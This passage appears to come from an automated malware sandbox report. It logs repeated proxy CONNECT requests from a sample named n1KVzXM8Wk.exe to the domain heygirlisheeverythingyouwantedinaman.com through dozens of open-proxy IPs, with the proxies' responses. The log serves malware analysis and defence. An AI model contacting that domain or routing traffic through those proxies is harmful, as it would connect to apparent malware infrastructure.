                                                                                                      49192.168.2.449943202.5.16.44806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.602528095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.761876106 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      50192.168.2.449861102.132.54.15180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.653503895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      51192.168.2.44996674.119.147.20941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.680968046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      52192.168.2.450008104.18.81.76806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.689954996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.784142017 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      53192.168.2.449817117.160.250.13488996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.693026066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.584229946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.085764885 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                      Feb 23, 2024 09:45:21.263925076 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      54192.168.2.449983166.62.53.45601866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.707447052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.115535975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.568635941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.646835089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      55192.168.2.450050104.19.171.188806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.737467051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.824356079 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      56192.168.2.450007198.12.253.138206812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.743822098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      57192.168.2.450064104.21.31.189806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.759406090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.847028017 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      58192.168.2.450009142.54.236.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.772588015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      59192.168.2.450108104.16.105.207806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.804472923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.891434908 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      60192.168.2.450030213.136.75.85590586812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.806112051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      61192.168.2.450074107.180.89.55255086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.816179991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.240475893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.693641901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      62192.168.2.4499648.213.137.1555436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.816267967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.131100893 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      63192.168.2.450122104.25.230.252806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.819015026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.906696081 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      64192.168.2.4500755.196.111.30204816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.834602118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      65192.168.2.450024185.132.242.21280836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.851027966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      66192.168.2.45009549.13.116.170316026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.879093885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.078393936 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      67192.168.2.450163172.67.182.169806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.881592035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.968518972 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      68192.168.2.449981221.194.149.8806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.884495020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.740570068 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.19.10
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 158
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.10</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      69192.168.2.45010187.106.114.12460056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.892359972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      70192.168.2.450039195.206.39.22280806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.896773100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.490539074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.272557974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.597354889 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      71192.168.2.450178104.25.58.39806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.898127079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.987313032 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      72192.168.2.4501343.122.84.9931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.911499023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.115727901 CET148INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: Servlet/2.4
                                                                                                      Server: squid/4.14
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      73192.168.2.450123208.87.131.151646936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.911832094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      74192.168.2.45017523.152.40.1431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.927314043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      75192.168.2.450040122.116.150.290006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.928715944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      76192.168.2.45011537.53.103.431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.936366081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.459263086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.131144047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.646845102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
